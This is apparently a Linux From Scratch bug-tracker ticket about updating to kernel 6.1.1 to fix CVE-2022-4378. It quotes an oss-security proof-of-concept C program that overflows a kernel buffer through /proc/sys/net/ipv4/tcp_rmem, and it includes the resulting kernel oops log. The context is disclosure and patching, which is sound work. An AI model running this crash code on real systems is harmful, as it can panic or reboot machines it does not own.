Opened 2 years ago

Closed 23 months ago

Last modified 22 months ago

#5179 closed enhancement (fixed)

linux-6.1.1

Reported by: Douglas R. Reno Owned by: lfs-book
Priority: high Milestone: 11.3
Component: Book Version: git
Severity: normal Keywords:
Cc:

Description

New point version

Contains a fix for CVE-2022-4378, an exploitable stack-based buffer overflow. Note that you must have the Net and User namespaces enabled on your system, but those are common on BLFS installations due to applications such as UPower and QtWebEngine. I believe the "Net" namespace is also turned on by default when you run 'make defconfig'.

(from the posting in oss-security): 

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("/proc/sys/net/ipv4/tcp_rmem", O_WRONLY);
    void *a = mmap(NULL, 0x2000, PROT_READ|PROT_WRITE,
MAP_ANON|MAP_PRIVATE, -1, 0);
    memset(a, '\x09', 0x2000);
    write(fd, a, 0x2000);
    return 0;
}

Upstream notes that the exploit will trigger a kernel panic on some systems. Using the proof-of-concept from the posting to oss-security, I get two different results:

x86_64 

[1306077.805917] BUG: unable to handle page fault for address: ffffa2bc82500000
[1306077.805922] #PF: supervisor write access in kernel mode
[1306077.805924] #PF: error_code(0x0002) - not-present page
[1306077.805925] PGD 100000067 P4D 100000067 PUD 100128067 PMD 13ff5f067 PTE 0
[1306077.805929] Oops: 0002 [#1] PREEMPT SMP
[1306077.805931] CPU: 2 PID: 17151 Comm: poc Not tainted 6.0.6 #1
[1306077.805934] Hardware name: Dell Inc. OptiPlex 9020/0KC9NP, BIOS A14 09/14/2015
[1306077.805935] RIP: 0010:proc_get_long.constprop.0+0xb5/0x200
[1306077.805940] Code: 89 54 04 12 4c 89 ea 4c 29 ca 48 29 d6 48 01 c2 48 83 e2 f8 49 89 f2 48 83 fa 08 72 1a 48 89 d6 31 d2 48 83 e6 f8 4d 8b 1c 12 <4d> 89 1c 11 48 83 c2 08 48 39 f2 72 ef c6 44 04 1a 00 0f be 44 24
[1306077.805941] RSP: 0018:ffffa2bc824ffcd8 EFLAGS: 00010203
[1306077.805943] RAX: ffffffffffffefff RBX: ffffffffffffefff RCX: ffffa2bc824ffd7f
[1306077.805945] RDX: 0000000000000308 RSI: ffffffffffffeff8 RDI: ffffa2bc824ffd7f
[1306077.805946] RBP: ffffa2bc824ffd80 R08: ffffffffffffefff R09: ffffa2bc824ffcf8
[1306077.805947] R10: ffffa0d6d9ea2006 R11: 0000000000000000 R12: 0000000000000000
[1306077.805949] R13: ffffa2bc824ffcf2 R14: ffffa2bc824ffd88 R15: ffffa2bc824ffd90
[1306077.805950] FS:  00007fcfb033f740(0000) GS:ffffa0d756b00000(0000) knlGS:0000000000000000
[1306077.805952] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[1306077.805953] CR2: ffffa2bc82500000 CR3: 0000000195394005 CR4: 00000000001706e0
[1306077.805955] Call Trace:
[1306077.805957]  <TASK>
[1306077.805961]  </TASK>
[1306077.805962] Modules linked in:
[1306077.805964] CR2: ffffa2bc82500000
[1306077.805965] ---[ end trace 0000000000000000 ]---
[1306077.805967] RIP: 0010:proc_get_long.constprop.0+0xb5/0x200
[1306077.805969] Code: 89 54 04 12 4c 89 ea 4c 29 ca 48 29 d6 48 01 c2 48 83 e2 f8 49 89 f2 48 83 fa 08 72 1a 48 89 d6 31 d2 48 83 e6 f8 4d 8b 1c 12 <4d> 89 1c 11 48 83 c2 08 48 39 f2 72 ef c6 44 04 1a 00 0f be 44 24
[1306077.805970] RSP: 0018:ffffa2bc824ffcd8 EFLAGS: 00010203
[1306077.805972] RAX: ffffffffffffefff RBX: ffffffffffffefff RCX: ffffa2bc824ffd7f
[1306077.805973] RDX: 0000000000000308 RSI: ffffffffffffeff8 RDI: ffffa2bc824ffd7f
[1306077.805975] RBP: ffffa2bc824ffd80 R08: ffffffffffffefff R09: ffffa2bc824ffcf8
[1306077.805976] R10: ffffa0d6d9ea2006 R11: 0000000000000000 R12: 0000000000000000
[1306077.805977] R13: ffffa2bc824ffcf2 R14: ffffa2bc824ffd88 R15: ffffa2bc824ffd90
[1306077.805978] FS:  00007fcfb033f740(0000) GS:ffffa0d756b00000(0000) knlGS:0000000000000000
[1306077.805980] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[1306077.805981] CR2: ffffa2bc82500000 CR3: 0000000195394005 CR4: 00000000001706e0

i686

System will reboot with no evidence of a kernel panic once the program is run.

More details can be found here: https://seclists.org/oss-sec/2022/q4/178

Change History (5)

comment:1 by Douglas R. Reno, 2 years ago

Note that this version also has a fix for CVE-2022-3435 ("ipv4: Handle attempt to delete multipath route when fib_info contains an nh reference") in it as well, according to https://linuxkernelcves.com/streams/6.0

comment:2 by Bruce Dubbs, 2 years ago

Summary: linux-6.0.12linux-6.1 (Wait for 6.1.1)

We now have linux-6.1. It's supposed to have rust code, but I haven't looked at it yet.

comment:3 by Bruce Dubbs, 2 years ago

Summary: linux-6.1 (Wait for 6.1.1)linux-6.1.1

comment:4 by Douglas R. Reno, 23 months ago

Resolution: fixed
Status: newclosed

Fixed at commit sha:888103d

comment:5 by Douglas R. Reno, 22 months ago

SA-11.2-070 issued

Note: See TracTickets for help on using tickets.